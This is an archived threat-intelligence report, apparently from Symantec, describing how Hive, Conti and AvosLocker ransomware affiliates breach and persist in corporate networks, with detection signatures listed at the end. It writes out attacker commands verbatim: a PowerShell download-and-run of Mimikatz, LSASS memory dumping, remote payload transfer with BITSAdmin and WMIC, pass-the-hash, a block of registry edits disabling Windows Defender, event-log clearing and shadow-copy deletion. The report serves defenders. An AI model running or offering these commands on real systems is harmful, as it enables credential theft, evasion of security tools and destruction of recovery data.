{ "id": "1ad3fe65-cd85-42a9-8414-dbfc4d533ac7", "created_at": "2026-04-06T00:15:53.032388Z", "updated_at": "2026-04-10T03:23:51.318731Z", "deleted_at": null, "sha1_hash": "03c3003dd7a13a7a64e21b55f503dda8ec7bc79d", "title": "Ransomware: How Attackers are Breaching Corporate Networks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 75569, "plain_text": "Ransomware: How Attackers are Breaching Corporate Networks\r\nBy About the Author\r\nArchived: 2026-04-05 21:57:49 UTC\r\nTargeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes.\r\nThe tactics used by ransomware attackers are continually evolving, but by identifying the most frequently\r\nemployed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how\r\nransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.\r\nSymantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three\r\nransomware families are being observed in the majority of recent attacks:\r\nHive\r\nConti\r\nAvoslocker\r\nSimilar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service\r\n(RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for\r\nlaunching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed\r\nattack steps laid out by the ransomware operators.\r\nOnce initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to\r\nhelp the operators achieve the following:\r\nGain persistence on the network\r\nEscalate privileges\r\nTamper with and evade security software\r\nLaterally move across the network\r\nInitial Access\r\nAffiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial\r\nfoothold on victim networks. Some of these techniques include:\r\nSpear phishing leading to the deployment of malware, including but not limited to:\r\nIcedID\r\nEmotet\r\nQakBot\r\nTrickBot\r\nTaking advantage of weak RDP credentials\r\nExploiting vulnerabilities such as:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 1 of 7\n\nMicrosoft Exchange vulnerabilities - CVE-2021-34473, CVE-2021-34523, CVE-2021-31207,\r\nCVE-2021-26855\r\nFortiGate firewall vulnerabilities - CVE-2018-13379 and CVE-2018-13374\r\nApache Log4j vulnerabily - CVE-2021-44228\r\nIn most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros\r\nthat lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use\r\nthis malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware\r\nthreats are then used to distribute ransomware onto compromised computers.\r\nPersistence\r\nAfter gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party\r\nsoftware such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to\r\nvictim networks. They also enable default Remote Desktop access in the firewall:\r\nnetsh advfirewall firewall set rule group=\"Remote Desktop\" new enable=yes\r\nActors are also known to create additional users on compromised systems to maintain access. In some instances\r\nwe have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultUserName /t\r\nREG_SZ /d \u003cuser\u003e /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t\r\nREG_SZ /d 1 /f\r\nDiscovery\r\nDuring the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets.\r\nSymantec has observed the aforementioned ransomware actors using tools such as the following:\r\nADRecon - Gathers Active Directory information and generates a report\r\nNetscan - Discovers devices on the network\r\nCredential Access\r\nMimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have\r\nobserved them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also\r\ninstances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:\r\npowershell IEX((new-object\r\nnet.webclient).downloadstring('https://raw.githubusercontent.com/\u003credacted\u003e/Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds\r\nIn addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll\r\ncombination to dump the LSASS memory:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 2 of 7\n\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump \u003cprocess id\u003e lsass.dmp full\r\nAdversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. In\r\nrare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the\r\ndump to extract valuable credentials.\r\nLateral Movement\r\nAttackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on\r\nvictim networks. We have also observed the attackers using several other techniques to laterally move across\r\nnetworks.\r\nPsExec\r\npsexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\\xxx.exe\r\nWMI\r\nwmic /node:@C:\\share$\\comps1.txt /user:\"user\" /password:\"password\" process call create \"cmd.exe /c bitsadmin\r\n/transfer xxx \\\\IP\\share$\\xxx.exe %APPDATA%\\xxx.exe\u0026%APPDATA%\\xxx.exe\"\r\nBITSAdmin\r\nbitsadmin /transfer debjob /download /priority normal hxxp://\u003cIP\u003e/ele.dll CSIDL_WINDOWS\\ele.dll\r\nMimikatz\r\nmimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:\u003cuser\u003e /domain:\u003cdomain\u003e /ntlm:\u003cntlm hash\u003e\"\r\nDefense Evasion\r\nAs with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security\r\nproducts that interfere with their goal. We have observed them meddling with security services using the net,\r\ntaskkill, and sc commands to disable or terminate them. In some cases they also use tools like PC Hunter to end\r\nprocesses. They have also been seen tampering with various registry entries related to security products, since\r\nchanges to the registry entries can make those products inoperative.\r\nBoth Hive and AvosLocker have been observed attempting to disable Windows Defender using the following\r\nreg.exe commands.\r\nAvosLocker:\r\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD\r\n/d 1 /f\r\nHive:\r\nreg.exe delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 3 of 7\n\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t\r\nREG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d\r\n\"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v\r\n\"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t\r\nREG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe delete aHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run” /v\r\n“Windows Defender” /f\r\nreg.exe delete “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” /v “Windows Defender” /\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 4 of 7\n\nDisabling the default Windows firewall is also one of the techniques we have seen being used by these\r\nransomware families:\r\nnetsh advfirewall set allprofiles state off\r\nTo cover their tracks on a victim system the actors may also clear the Windows event log:\r\nwevtutil.exe cl system\r\nwevtutil.exe cl security\r\nwevtutil.exe cl application\r\npowershell -command \"Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }\"\r\nImpact\r\nAdversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators\r\nto recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption\r\nprocess. They perform this task by using tools like Vssadmin or WMIC and running one of the following\r\ncommands:\r\nvssadmin.exe delete shadows /all /quiet\r\nwmic.exe shadowcopy delete\r\nWe have also seen BCDEdit being used to disable automatic system recovery and to ignore failures on boot:\r\nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit.exe /set {default} recoveryenabled no\r\nIn some instances the actors delete the safe mode settings in the registry to stop security product services from\r\nstarting in safe mode:\r\nreg delete HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\\u003cservice\u003e /f\r\nExfiltration\r\nAttackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the\r\nstolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following\r\ncloud services to exfiltrate data:\r\nhttps://anonfiles.com\r\nhttps://mega.nz\r\nhttps://send.exploit.in\r\nhttps://ufile.io\r\nhttps://www.sendspace.com\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 5 of 7\n\nWe have also seen attackers use the following tools for data exfiltration:\r\nFilezilla\r\nRclone\r\nConclusion\r\nThe TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these\r\nthreat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver\r\ntheir targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security\r\napproach.\r\nSymantec Protection\r\nSymantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic\r\ntechnologies.\r\nAV Protection\r\nRansom.Hive\r\nRansom.Conti\r\nRansom.AvosLocker\r\nBackdoor.Cobalt\r\nHacktool.Mimikatz\r\nTrojan.IcedID*\r\nTrojan.Emotet*\r\nW32.Qakbot*\r\nTrojan.Trickybot*\r\n Behavioral Protection\r\nSONAR.RansomHive!g2\r\nSONAR.RansomHive!g3\r\nSONAR.RansomHive!g4\r\nSONAR.RansomAvos!g2\r\nSONAR.RansomConti!g1\r\nSONAR.RansomConti!g3\r\nSONAR.RansomConti!g4\r\nSONAR.Ransomware!g30\r\nSONAR.RansomGregor!g1\r\nSONAR.SuspLaunch!gen4\r\nSONAR.SuspLaunch!g18\r\nSONAR.Ransom!gen59\r\nSONAR.Ransomware!g26\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 6 of 7\n\nSONAR.Cryptlck!g171\r\nIntrusion Prevention System (IPS) detections\r\nIPS blocks initial access, persistence, and lateral movement. SEP's Audit Signatures are intended to raise\r\nawareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block.\r\nAdministrators reviewing the logs of IPS events in their network can note these Audit events and decide whether\r\nor not to configure the corresponding Audit Signatures to block the traffic.\r\nThe following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use\r\nof software or tools such as AnyDesk, ScreenConnect, and PsExec.\r\n33211 [Audit: AnyDesk Remote Desktop Activity]\r\n33156 [Audit: ScreenConnect Remote Support Software Activity]\r\n30068 [Audit: PSExec Utility Activity]\r\n33588 [Audit: WMIC Remote RPC Interface Bind Attempt]\r\n33311 [Audit: PCHunter Tool Activity]\r\n33295 [Attack: Ransom.Conti Activity 3]\r\n33435 [Attack: Ransom.AvosLocker Activity 3]\r\n33444 [Attack: Ransom.AvosLocker Activity 4]\r\n32436 [Attack: Ransom.Gen Activity 29]\r\n33323 [Attack: Ransom.Hive Activity]\r\n33119 [Audit: RClone Tool Activity]\r\nSymantec recommends that you have intrusion prevention enabled on all your devices including servers.\r\nAdaptive Protection\r\nSymantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques\r\nused by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you\r\nshould “Deny” these applications and actions using Symantec Adaptive Protection policies.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker" ], "report_names": [ "ransomware-hive-conti-avoslocker" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434553, "ts_updated_at": 1775791431, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/03c3003dd7a13a7a64e21b55f503dda8ec7bc79d.pdf", "text": "https://archive.orkl.eu/03c3003dd7a13a7a64e21b55f503dda8ec7bc79d.txt", "img": "https://archive.orkl.eu/03c3003dd7a13a7a64e21b55f503dda8ec7bc79d.jpg" } }